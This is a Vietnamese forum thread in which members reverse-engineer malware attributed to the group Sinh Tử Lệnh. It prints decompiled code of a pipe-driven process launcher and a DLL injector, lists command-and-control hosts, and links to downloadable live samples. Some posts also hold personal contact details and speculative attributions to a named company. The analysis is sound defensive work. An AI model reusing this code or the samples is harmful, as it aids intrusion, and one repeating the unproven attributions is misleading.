banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thủ thuật reverse engineering RCE đám virus của Sinh Tử Lệnh.  XML
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 01/06/2011 15:06:31 (+0700) | #61 | 238364
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

TQN wrote:
Tính post tiếp nhưng tới lúc decode xong lại thấy ngờ ngợ, hình như là, khoãng 50%, wbmain.dll có lẽ không phải của STL, nhưng cũng có thể. Bà con ai nhớ cái: www.adobe-upgrade.com và AdobeUpdateManager.exe không ?

AdobeUpdateManager.exe hình như là 1 con Bot, còn server adobe-upgrade.com thì down lâu rồi, whois, google không thấy. Không lẽ tui đi sai hướng.

Hiện tại trong đống virus database lưu trên máy tui, thấy rõ 2 trường phái coding khác nhau. Version của 2 đám này cũng lung tung hết, không xác định được.

Nếu thật là sai hướng thì xin lỗi anh em, đã làm mất thời gian của anh em theo dõi tọpic này. 



AdobeUpdateManager.exe có nhúng vào một bot. Việc này McAfee phát hiện cách đây khoảng nửa năm gì đó. McAfee có thông báo trên một blog của họ và tôi có hai ý kiến trong phần comment.

wbmain.dll thì Kaspersky đã phát hiện cách đây vài tháng gì đó và phân loại nó là một downloader Trojan (Trojan.Downloader.Win32.Agent.ffxc), PE compact file. Hãng Ikarus cũng đã detect ra con này trước đây.

Hardkbd.dll và wbmain.dll đã xuất hiện từ năm 2007 (tác giả đầu tiên có lẽ là các hacker Mỹ hay Nga) và đươc sử dung như một file "thông dụng-hiệu quả" để nhét vào nhiều loai Trojan khác nhau. STL và các hacker Trung quốc nói chung thích "sử dụng" các file này và cải tiến chúng trong quá trình sử dụng. Thí dụ gần đây chúng đưa vào các "Keymaker" để tạo ra các key-serial no. dùng cho 1 chương trình cài đặt VM (máy ảo) trên một hệ thống Windows.

Gần đây AntiVir (tác già phần mềm nổi tiếng Antivirus Avira) và hãng Dr.Web (một hãng IT và Antivirus đang lên của Nga-Liên xô cũ) cũng đã detect ra Hardkbd.dll như là một Trojan

Quá trình compile và disassembling hai file dll nói trên của TQN khá hay và mang lại nhiều thông tin hữu ích. Cám ơn TQN
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 01/06/2011 15:28:41 (+0700) | #62 | 238365
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
hardkbd.dll thì em đã up cho Kaspersky lab để phân tích rồi. Em cũng gởi kèm file IDA .idb của em luôn.
Tiếp theo, chúng ta sẽ tiếp tục với đám bot của tụi STL này. Đám bot này Zorro gởi cho tui, không biết sao Zorro lại dính nó. Và chắc chắn đám bot này là của tụi STL, không chạy đi đâu được. Dưới đây là file config của đám bot này:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";>
<html xmlns=\"http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" content="Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý">
<link rel=StyleSheet href="/verification/verification.css" type="text/css" media="screen,print">
<title>Dien dan X-cafe - Ton trong su khac biet tren tinh thanh duy ly</title>
</head>
<body>
<div id="outer">
<div id="header"><h1>Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý</h1></div>
<div id="main">
<form action="/verification/index_captcha.php" method="GET">
<input type="hidden" name="auth_key" value="94d3fa0375ca9e22b54f431051c797d2">
<input type="submit" value="Bấm vào đây để đi tiếp">
</form>
</div>
</div>
</body>
</html>
 


KAV đã phát hiện ra toàn bộ wscntfy.* này là Vecebot, vì vậy em phải tạm tắt KAV
Mục đích cuối cùng của em là tìm cho ra thằng nào up msdata.vxd chứa keypress của em lên cho tụi STL để nó hai lần vào lấy account HVA, Yahoo của em.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 01/06/2011 15:59:14 (+0700) | #63 | 238368
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

TQN wrote:
hardkbd.dll thì em đã up cho Kaspersky lab để phân tích rồi. Em cũng gởi kèm file IDA .idb của em luôn.
Tiếp theo, chúng ta sẽ tiếp tục với đám bot của tụi STL này. Đám bot này Zorro gởi cho tui, không biết sao Zorro lại dính nó. Và chắc chắn đám bot này là của tụi STL, không chạy đi đâu được. Dưới đây là file config của đám bot này:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";>
<html xmlns=\"http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" content="Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý">
<link rel=StyleSheet href="/verification/verification.css" type="text/css" media="screen,print">
<title>Dien dan X-cafe - Ton trong su khac biet tren tinh thanh duy ly</title>
</head>
<body>
<div id="outer">
<div id="header"><h1>Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý</h1></div>
<div id="main">
<form action="/verification/index_captcha.php" method="GET">
<input type="hidden" name="auth_key" value="94d3fa0375ca9e22b54f431051c797d2">
<input type="submit" value="Bấm vào đây để đi tiếp">
</form>
</div>
</div>
</body>
</html>
 


KAV đã phát hiện ra toàn bộ wscntfy.* này là Vecebot, vì vậy em phải tạm tắt KAV
Mục đích cuối cùng của em là tìm cho ra thằng nào up msdata.vxd chứa keypress của em lên cho tụi STL để nó hai lần vào lấy account HVA, Yahoo của em. 

Các file .vxd là của Microsoft, sản phẩm của lão Bill Gate từ những năm 95, 96 gì đó và chúng đã có trong Windows 95, 98.... Tuy nhiên tôi không thấy Microsoft có "ban hành" một file .xvd nào có tên là msdata. Rõ ràng đây là một file của STL, như TQN đã nhận định.

File .xvd thuộc loai file liên quan đến "Virtual Device Driver" (nhưng sao Ms không đặt đuôi file là .vdd nhỉ?. Hì hì). File này hỗ trợ việc chạy một file .exe trong một quá trình liên quan đến Device Drivers, thí dụ quá trình cài đặt các Driver của một số hardware trên hệ thống hay update driver trên mang.

Trong Win XP (SP3) và Win 2K3 của tất cả các máy tôi đang dủng và cài đặt, config. cho anh em cơ quan ... tôi không thấy sự hiện diện của file msdata.vxd. (Mà hầu hết hay tất cả các Win này đều là dùng chùa cả ... Hì hì. Nghèo nên không đủ tiền mua). Tôi chỉ thấy có file là dsound.vxd. File này dường như cần thiết để chứng tỏ hệ thống có thể cài đươc vào một loai GAME nào đó (DX game chăng?)

TQN xem vừa qua có cài một soft. (có crack) nào đó mà quá trình cài có liên quan đến Virtual Device Driver không?
Thí dụ một chương trình tạo máy ảo trên nền Windows chẳng hạn?

(Dường như STL biết tìm cách mời chào những món hàng cao cấp cho những người có kỹ thuật cao cấp và chỉ chờ cơ hôi họ quá bận bịu vì công việc, nên có lúc vô tình dùng món hàng độc. Thâm như T... là vậy)
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 01/06/2011 16:14:27 (+0700) | #64 | 238369
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
TQN phân vân về "AdobeUpdateManager.exe" nên anh chen vô một tí. "AdobeUpdateManager.exe" có liên quan với STL hay không thì đây là chuyện còn chưa rõ 100% nhưng có một số thông tin đáng chú ý:

1. AdobeUpdateManager.exe chính là một phần của VulcanBot mà đám McAfee đã công bố hồi tháng 4 năm 2010 và vpskeys, bộ gõ tiếng Việt của nhóm chuyên gia Việt Nam bị thay đổi và hàng ngàn người dùng bị dính chấu. Theo thông tin (bên trong) của một người bạn trong nhóm VPS cho biết, máy chủ của VPS bị thâm nhập và có nguồn IP đi từ VN.

2. VulcanBot trong thời hoạt động trỏ về 7 hosts khác nhau, trong đó có một dynamic host sử dụng dyn dns có tên là: tyuqwer.dyndns.org. Theo cache lưu của nhiều nơi trên Internet, tyuqwer.dyndns.org có IP là 112.78.5.79, một IP thuộc "Công ty Cổ phần Dich vụ dữ liệu Trực tuyến" có văn phòng chính ở Q.3, TPHCM.

3. Hiện nay một số hosts trên không còn hoạt động, một số hosts khác trỏ về 209.200.249.62, một server thuộc data center LUNARPAGES ở Mỹ. Đây là nhóm IP bị blacklisted trên hầu như các thiết bị bảo mật.

4. Domain name: update-adobe.com hiện do đám onlineNIC ở HK, CN quản lý. STL đã dời hầu hết các tên miền quan trọng của họ về registrar này ở CN. Nếu đám tạo VulcanBot này cũng chọn OnlineNIC này để lưu trú như STL thì quả là thú vị smilie.


PS: Ngân ơi, để anh gởi em thêm vài món khá mới để em RE tiếp cho vui cửa vui nhà smilie.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 01/06/2011 16:28:54 (+0700) | #65 | 238372
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
"Công ty Cổ phần Dich vụ dữ liệu Trực tuyến", thằng này nằm sát nhà em, cách chưa tới 100m đâu, chiều nào em đón hai con heo con của em đi học cũng đi qua nó. Nó ở BT chứ không phải Q.3 đâu anh. Có phải là tên QCV không anh em STL ?
Ặc ặc, bà xã em la làng, anh vào SG mấy ngày rồi, ngồi lỳ trên máy, nốc bia liên tục kìa ! Anh mà gởi nữa chắc em đi die luôn. Ngày mai em phải đi làm rồi. Máy móc, công trình...
2 anh PXMMRF: File msdata.vxd chỉ là giả danh thôi anh, nó chỉ là file text bình thường, toàn bộ nội dung của nó được xor với 0x6F. Anh xem lại code ASM mà em đã post.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 01/06/2011 17:07:13 (+0700) | #66 | 238373
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

conmale wrote:
.
....................................................
2. VulcanBot trong thời hoạt động trỏ về 7 hosts khác nhau, trong đó có một dynamic host sử dụng dyn dns có tên là: tyuqwer.dyndns.org. Theo cache lưu của nhiều nơi trên Internet, tyuqwer.dyndns.org có IP là 112.78.5.79, một IP thuộc "Công ty Cổ phần Dich vụ dữ liệu Trực tuyến" có văn phòng chính ở Q.3, TPHCM.

...........................................................

4. Domain name: update-adobe.com hiện do đám onlineNIC ở HK, CN quản lý. STL đã dời hầu hết các tên miền quan trọng của họ về registrar này ở CN. Nếu đám tạo VulcanBot này cũng chọn OnlineNIC này để lưu trú như STL thì quả là thú vị smilie.


PS: Ngân ơi, để anh gởi em thêm vài món khá mới để em RE tiếp cho vui cửa vui nhà smilie


(2) Bọn này (chắc là STL) hơi buồn cười. Sử dụng tên miền năng động (dynamic system domain -dynamic host)
cho một webserver cốt là để có thể thiết lập một webserver với một WAN dynamic IP, khi không có một WAN static IP. Đây cũng là cách để giấu (một cách hiệu quả) vị trí địa lý đặt webserver. Thế mà các bác ấy lại config. "dyndns update (IP) soft" với một IP tĩnh, dù rằng trên soft nói trên cũng có option này. Ngu ngơ quá đi thôi. Chắc phải vào HVA forum đọc thêm vài bài.

(4) Trụ sở tại HK (China) của các bác này còn có những chuyện bí mật khác. Hì hì
Registrar của cái domain SMARTSHOW.INFO của STL mà TQN mới phát hiện ra cũng là OnlineNIC
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 01/06/2011 17:24:36 (+0700) | #67 | 238374
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Đúng là em search Smartshow.info thì lòi ta 1 đống trang của tụi "Tàu khựa". Bọn STL này có vẻ thích chơi với Tàu. Bán nước hả tụi mày !?
Nhờ anh em admin, mod lưu lại toàn bộ image và file em up lên mediafire. Đề phòng tụi nó lại cướp pass của em vào mediafire và imageshack xoá hết. Em thì rút kinh nghiệm, vừa lưu HD, vừa lưu USB mang theo người.
Chiều giờ vào mediafire chậm quá, em up toàn bộ IDA idb file của hardkbd.dll và wbmain.dll. wbmain.idb hơi bị bự do ida-x86emu add một mớ segment: stack, heap, peb, teb, idt, gdt... vào.
Quan trọng kế tiếp là đám Vecebot của Zorro. RCE đám malware này, chúng ta sẽ tìm hiểu được phương thức tấn công, URL của bot host mà đám bot này nhận lệnh. Em cũng up lên meidafire luôn. Trong đống này em mới RCE một số thôi Anh em RE khác vào phụ em với.
PS: Anh em reversers khác như lammer, hacnho, kienmanowar, rongchaua, Merc, Thug... đâu hết rồi, vào cùng tham gia với em cho vui chứ. Cứ mạnh tay: Oh, TQN ơi, mày sai chổ này nè, mày sót chổ kia kìa... Vậy mới vui cửa vui nhà chứ, toàn mình em độc diễn không à, buồn quá. Em không tự ái đâu, trứng cút còn có trứng lộn mà.
Quái, chiều giờ vào mediafire để up vecebot mà không được ???
Giờ cũng vào được rồi:
http://www.mediafire.com/?xzt7i9i4s9m7juj
http://www.mediafire.com/?1vh7qdcf3ccsi81
Password như cũ: malware
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 03/06/2011 11:28:21 (+0700) | #68 | 238625
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Em gần như chắc chắn 80% nhóm viết malware wbmain.dll và nhóm viết hardkdb.dll, file .exe mà shellcode của file Word của STL là 1. Em đang RCE file .exe mà shellcode download về hồi đó.
File exe này dùng khá nhiều kỹ thuật antidebug, detect DeepFreeze, VMWare, VirtualBox.
Có một điều đặc biệt, coder của update.exe này dùng parameter 123456789 để test và kiểm tra Windows Key của chính máy mình:




File Exe này STL coder cũng build = VC++ 2010, dùng pure C, không dùng C++ như wbmain.dll, coding style là một, y chang với hardkbd.dll. Nhưng trong file EXE này, ta lại gặp hàm decode quen thuộc của wbmain.dll (1 trong 3 hàm decode của nó):


Điều này chứng tỏ (hỏi hay ngã ha) điều gì ? Dùng chung 1 thư viện hay share code lẫn nhau ?

PS: Mấy anh STL giỏi quá, em ngưỡng một thật. Thôi bây giờ thay vì DDOS, hack vào các trang Hải Ngoại, các anh hãy DDOS, hack vào mấy website của bọn Ba tàu đi. Được không mấy anh ??????? Coi như chứng tỏ lòng yêu nước đấy. Dán cái hình STL vào mặt tụi nó, thêm chữ VietNam nữa nha !

À mà quên, hồi đó, lúc EXE này run, em capture network traffic, thấy nó connect tới host này:

http://79.49.2d.static.xlhost.com

eNET Inc.
3000 E. Dublin Granville Road
Columbus, OH 43231
US

Domain Name: XLHOST.COM

------------------------------------------------------------------------
Promote your business to millions of viewers for only $1 a month
Learn how you can get an Enhanced Business Listing here for your domain name

Learn more at http://www.NetworkSolutions.com/
------------------------------------------------------------------------

Administrative Contact, Technical Contact:
Kharazi, Saeed ski@EE.NET
eNET Inc.
3000 East Dublin-Granville Road
Columbus, OH 43231
US
(614) 794-5971 fax: (614) 794-9016


Record expires on 05-Jan-2021.
Record created on 05-Jan-2000.
Database last updated on 3-Jun-2011 01:35:13 EDT.

Domain servers in listed order:

DNS2.EE.NET 206.222.1.2
DNS3.EE.NET 206.222.1.3
 


Cha, host này vẫn còn sống à, vừa last update hôm nay luôn. Mấy anh giàu quá, đk host tùm lum hết.

PS: Mọi ý kiến trao đổi với tui, các bạn có thể PM hay gởi vào hòm thư: truong.quoc.ngan@gmail.com của mình. Hộp thư Yahoo thì để riêng.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 03/06/2011 13:37:33 (+0700) | #69 | 238650
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Hì hì, TQN ngó vậy mà cũng hài thiệt đó smilie .

Những traffic đi tới xlhost.com là traffic em bot đi nhận mệnh lệnh đó. smartshow.info trước đây cũng đã từng nằm trên xlhost.com

PS: anh đang tìm cách "thương lượng" cái IDA Pro 6.1 cho em. Đắt quá nên cần phải coi thử có cách nào giảm bớt chi phí không.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 03/06/2011 15:11:55 (+0700) | #70 | 238665
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cảm ơn anh conmale, mua không nổi đâu, "IDA Pro Standard Licenses start at 539 USD or 419 EUR. IDA Pro Advanced Licenses start at 1059 USD / 809 EUR".
Mà có đặc điểm là có mua tụi nó cũng không bán, tụi nó sợ leak ra ngoài. Tụi nó check khách hàng kỹ lắm, phải uy tín, là công ty bảo mật thì mới bán.

Tui đã up lên mediafire file exe mà file word này drop xuống, đồng thời khi nó run, nó sẽ extract ra 2 file DLL: dao360.dll.mui và ipripv6.dll. 2 thằng này chính là 2 file quan trọng nhất của nhóm malware này.
http://www.mediafire.com/?ldgjlc7z88lambb
Password: malware
File dropper exe không nhúng 2 dll vào trong resource, chúng cùng DrWatson.exe được nén rồi nhúng hết vào data section. Khi run thì extract ra %Temp%, dùng Zlib để uncompress. Đây là một cách mà STL dùng để qua mặt các AV.
File DrWatson.exe là file của STL, không phải file của MS. Nó được dropper .exe extract ra %Temp%\update.tmp dưới dạng zip format, unzip ra (dùng zlib) thành file DrWatson.exe rồi run.
Cả hai file này đều được dropper .exe xoá ngay sau khi run.

Khối lượng các file cần RCE rất lớn, tui up lên mediafire để mọi người cùng tham gia RCE và phân tích, thảo luận.
Tụi STL phải thấy là, không phải cái gì tụi nó làm thì không ai biết hết.
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 04/06/2011 16:39:54 (+0700) | #71 | 239001
[Avatar]
secmask
Elite Member

[Minus]    0    [Plus]
Joined: 29/10/2004 13:52:24
Messages: 553
Location: graveyard
Offline
[Profile] [PM] [WWW]
Em tham gia tí smilie
Code:
.code:10001D00 ; DWORD __stdcall StartAddress(LPVOID)
.code:10001D00 StartAddress    proc near               ; DATA XREF: ThreadAProc+23o
.code:10001D00                 push    ebp
.code:10001D01                 mov     ebp, esp
.code:10001D03                 and     esp, 0FFFFFFF8h ; Logical AND
.code:10001D06                 push    ecx
.code:10001D07                 push    esi
.code:10001D08                 mov     esi, ds:Sleep   ; Suspends the execution of the current thread for at least the specified interval.
.code:10001D0E                 mov     edi, edi
.code:10001D0E
.code:10001D10
.code:10001D10 loc_10001D10:                           ; CODE XREF: StartAddress+19j
.code:10001D10                 call    readPipeTokenExec ; Token input from pipeline using delimiter '\09'
.code:10001D10                                         ; in format type|libname|parameter
.code:10001D10
.code:10001D15                 push    100             ; dwMilliseconds
.code:10001D17                 call    esi ; Sleep     ; Indirect Call Near Procedure
.code:10001D17
.code:10001D19                 jmp     short loc_10001D10 ; Jump
.code:10001D19
.code:10001D19 StartAddress    endp

Code:
// Token input from pipeline using delimiter '\09'
// in format type|libname|parameter
int __cdecl readPipeTokenExec()
{
  void *v0; // eax@1
  void *v1; // ebp@1
  int tokenCnt; // edi@4
  wchar_t *aToken; // esi@4
  wchar_t *v4; // eax@8
  const WCHAR v5; // cx@9
  __int16 *v6; // eax@12
  __int16 v7; // cx@13
  char v9; // [sp+10h] [bp-2874h]@1
  int exeType; // [sp+14h] [bp-2870h]@1
  DWORD NumberOfBytesRead; // [sp+18h] [bp-286Ch]@1
  wchar_t *Context; // [sp+1Ch] [bp-2868h]@1
  struct _PROCESS_INFORMATION ProcessInformation; // [sp+20h] [bp-2864h]@1
  struct _STARTUPINFOW StartupInfo; // [sp+30h] [bp-2854h]@1
  const WCHAR LibFileName; // [sp+78h] [bp-280Ch]@1
  char v16; // [sp+7Ah] [bp-280Ah]@1
  __int16 Buffer; // [sp+878h] [bp-200Ch]@1
  char v18; // [sp+87Ah] [bp-200Ah]@1
  __int16 createProcessParam; // [sp+1078h] [bp-180Ch]@1
  char v20; // [sp+107Ah] [bp-180Ah]@1
  WCHAR CommandLine; // [sp+1878h] [bp-100Ch]@1
  char v22; // [sp+187Ah] [bp-100Ah]@1
  unsigned int v23; // [sp+287Ch] [bp-8h]@1

  v23 = (unsigned int)&v9 ^ dword_1001201C;
  Buffer = 0;
  memset(&v18, 0, 0x7FEu);
  LibFileName = 0;
  memset(&v16, 0, 0x7FEu);
  createProcessParam = 0;
  memset(&v20, 0, 0x7FEu);
  CommandLine = 0;
  memset(&v22, 0, 0xFFEu);
  NumberOfBytesRead = 0;
  exeType = 0;
  Context = 0;
  memset(&StartupInfo.lpReserved, 0, 0x40u);
  ProcessInformation.hProcess = 0;
  ProcessInformation.hThread = 0;
  ProcessInformation.dwProcessId = 0;
  ProcessInformation.dwThreadId = 0;
  StartupInfo.cb = 68;
  StartupInfo.dwFlags = 1;
  StartupInfo.wShowWindow = 0;
  v0 = (void *)mCreatePipe((const WCHAR *)dword_NamedPipe);
  v1 = v0;
  if ( v0 != (void *)-1 && ConnectNamedPipe(v0, 0) )
  {
    memset(&Buffer, 0, 2048u);
    memset((void *)&LibFileName, 0, 0x800u);
    memset(&createProcessParam, 0, 0x800u);
    memset(&CommandLine, 0, 0x1000u);
    while ( ReadFile(v1, &Buffer, 0x400u, &NumberOfBytesRead, 0) )
    {
      aToken = wcstok_s((wchar_t *)&Buffer, &Delim, &Context);
      tokenCnt = 0;
      while ( aToken )
      {
        if ( tokenCnt )
        {
          if ( tokenCnt == 1 )
          {
            v4 = aToken;
            do
            {
              v5 = *v4;
              *(wchar_t *)((char *)v4 + (char *)&LibFileName - (char *)aToken) = *v4;
              ++v4;
            }
            while ( v5 );
          }
          else
          {
            if ( tokenCnt == 2 )
            {
              v6 = (__int16 *)aToken;
              do
              {
                v7 = *v6;
                *(__int16 *)((char *)v6 + (char *)&createProcessParam - (char *)aToken) = *v6;
                ++v6;
              }
              while ( v7 );
            }
          }
        }
        else
        {
          exeType = _wtoi(aToken);
        }
        aToken = wcstok_s(0, &Delim, &Context);
        ++tokenCnt;
        Sleep(0);
      }
      switch ( exeType )
      {
        case 1:
          if ( IsExistPEFile(&LibFileName) )
          {
            wrap_vprintf((const char *)L"%s %s", &LibFileName, &createProcessParam);
            CreateProcessW(0, &CommandLine, 0, 0, 0, 0x8000020u, 0, 0, &StartupInfo, &ProcessInformation);
          }
          break;
        case 2:
          if ( isExist_PE_Dll_File(&LibFileName) )
            LoadLibraryW(&LibFileName);
          break;
        case 99:
          goto LABEL_23;
      }
      memset(&Buffer, 0, 0x800u);
      memset((void *)&LibFileName, 0, 0x800u);
      memset(&createProcessParam, 0, 0x800u);
      memset(&CommandLine, 0, 0x1000u);
    }
LABEL_23:
    DisconnectNamedPipe(v1);
  }
  DisconnectNamedPipe(v1);
  if ( v1 )
    CloseHandle(v1);
  return 0;
}

Thread này tạo vòng lặp, đọc namedpipe "\\\\.\\pipe\\NannedPipe" lấy tham số để gọi chạy process mới hoặc load DLL. Mỗi dòng đọc được từ pipeline sẽ được tách thành 3 tokens.
Token1: giá trị = 1 ứng với file executable, giá trị = 2 ứng với file DLL.
Token2: đường dẫn đến executable hoặc DLL.
Token3: parameter để chạy chuơng trình.
token được phân tách dùng kí tự '\09'
đây có thể là một file che dấu dưới dạng chuơng trình tin cậy, duy trì lâu dài để spawn ra các process mới.

Thread thứ 2 làm nhiệm vụ duyệt danh sách process, dùng các kĩ thuật dạng CreateRemoteThread để inject module sang:

Code:
int __cdecl ThreadAProc()
{
  DWORD v0; // edi@1
  DWORD v1; // esi@1
  FARPROC IsWow64Process_; // ebx@3
  HMODULE kernelModuleHandle; // eax@3
  HANDLE currentProcess; // eax@4
  int encVersion; // eax@5
  int isWow64; // [sp+Ch] [bp-4h]@3

  v0 = 0;
  v1 = 0;
  if ( hModule )
    sub_10002900();
  decodeBuildFilePath();
  CreateThread(0, 0, StartAddress, 0, 0, 0);
  isWow64 = 0;
  kernelModuleHandle = GetModuleHandleW(L"kernel32");
  IsWow64Process_ = GetProcAddress(kernelModuleHandle, "IsWow64Process");
  if ( IsWow64Process_ )
  {
    currentProcess = GetCurrentProcess();
    ((void (__stdcall *)(HANDLE, int *))IsWow64Process_)(currentProcess, &isWow64);
  }
  encVersion = getEncodedOSVersion();
  if ( !isWow64 )
  {
    if ( encVersion == 4 || encVersion == 6 || encVersion == 7 )
      v0 = sub_100020E0();
    scheJobNtXP20037((void *)v0);
    while ( 1 )
    {
      Sleep(600000u);
      scheJobNtXP20037((void *)v0);
    }
  }
  if ( encVersion == 8 || encVersion == 5 )
  {
    while ( 1 )
    {
      Sleep(600000u);
      v1 = scheJobV8n5(v1);
    }
  }
  return 0;
}

[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 11/06/2011 17:35:19 (+0700) | #72 | 240341
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
IDA 6.1 released (not cracked) - EXETOOLS FORUM
http://forum.exetools.com/showthread.php?t=13428

bolzano_1989 thấy anh TQN đã có rồi smilie .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 11/06/2011 18:24:42 (+0700) | #73 | 240347
quangredlight
Member

[Minus]    0    [Plus]
Joined: 14/09/2008 18:52:09
Messages: 15
Offline
[Profile] [PM]
Không biết các bác nhận xét thế nào chứ HexRay vẫn là 1.1 thì em dùng IDA 5.5 cho lành. Em chỉ phân tích tĩnh là chính, chả dùng mấy tính năng nâng cao của nó. Nếu có HexRay mới thì ngon.

Mới Leak hôm nay mà cư dân mạng download nhộn nhịp quá smilie
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 12/06/2011 11:05:33 (+0700) | #74 | 240409
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
NannedPipe, Nanned: các bạn có biết nghĩa hay phát âm của ngôn ngữ nào có từ Nanned này không ?
Em google hết thì chỉ thấy Google khuyên từ này: Nanning (Nam Ninh - Tàu khựa).
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 12/06/2011 15:40:30 (+0700) | #75 | 240438
[Avatar]
van7hu
Member

[Minus]    0    [Plus]
Joined: 03/07/2010 02:38:47
Messages: 63
Location: Thuỷ điện Hoà Bình
Offline
[Profile] [PM]

TQN wrote:
NannedPipe, Nanned: các bạn có biết nghĩa hay phát âm của ngôn ngữ nào có từ Nanned này không ?
Em google hết thì chỉ thấy Google khuyên từ này: Nanning. 

Có lẽ nào là "Named", "NamedPipe" không anh?
anyway, chẳng biết gì cả, thấy bài viết của anh hay quá, mỗi tội không đủ trình để tham khảo, mong anh cố gắng viết tiếp.
https://www.facebook.com/buivan.thu.94
Được phục vụ cho tổ quốc, đó là một niềm vinh hạnh lớn lao..
[Up] [Print Copy]
  [Analyzing]   RCE đám virus của Sinh Tử Lệnh. 12/06/2011 15:46:49 (+0700) | #76 | 240439
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Named: 5 chữ. Nanned: 6 chữ. Tui nghĩ không thể là named được đâu. Vì khi create pipe, coder thường đặt tên pipe có nghĩa với riêng mình hoặc unique name (theo GUIID chẵng hạn).
Tuị coder STL này dùng chung 1 vài lib, các lib này lại có build option không thống nhất, khi thì có /GS, khi thì không. Rồi nội cái vụ remote inject code, remote load dll, tụi này lại dùng lung tung hàm, mà cái nào cuối cùng cũng đi tới La mã cả, phải không anh em STL ? Mai mốt rút kinh nghiệm, viết code optimize một chút nhé, exe, dll nhỏ hơn, em RCE cũng đỡ cực, chứ giờ em chả biết đặt tên proc ra sao nữa: InjectCode, RemoteInjectCode, RemoteNtLoadLibrary, RemoteNtCreateThreadEx... Lung tung cả, em quáng gà luôn, mà duyệt lên duyệt xuống thì code cứ na ná nhau, làm nhiệm vụ như nhau, bực quá, muốn xoá hết cho rồi.
Em nói mấy anh em STL không tin, review lại code ipripv6.dll đi thì biết em nói đúng hay sai nhé ?
Vd như hàm này, có thể em đặt tên hàm sai, nhưng mà công nhận mấy anh rãnh ghê ha:
Code:
// Create global pipe name: \\\\.\\pipe\\NannedPipe
// VA: 10001000, file ipripv6.dll
wchar_t* _cdecl CreatePipeName()
{
  void *pMem;

  pMem = malloc(100);
  g_wszPipeName = pMem;
  if ( pMem )
  {
      memset(pMem, 0, 0x64u);
      wstrcpy(g_wszPipeName, L"\\\\.\\pipe\\NannedPipe");
  }
  return &g_wszPipeName;
}

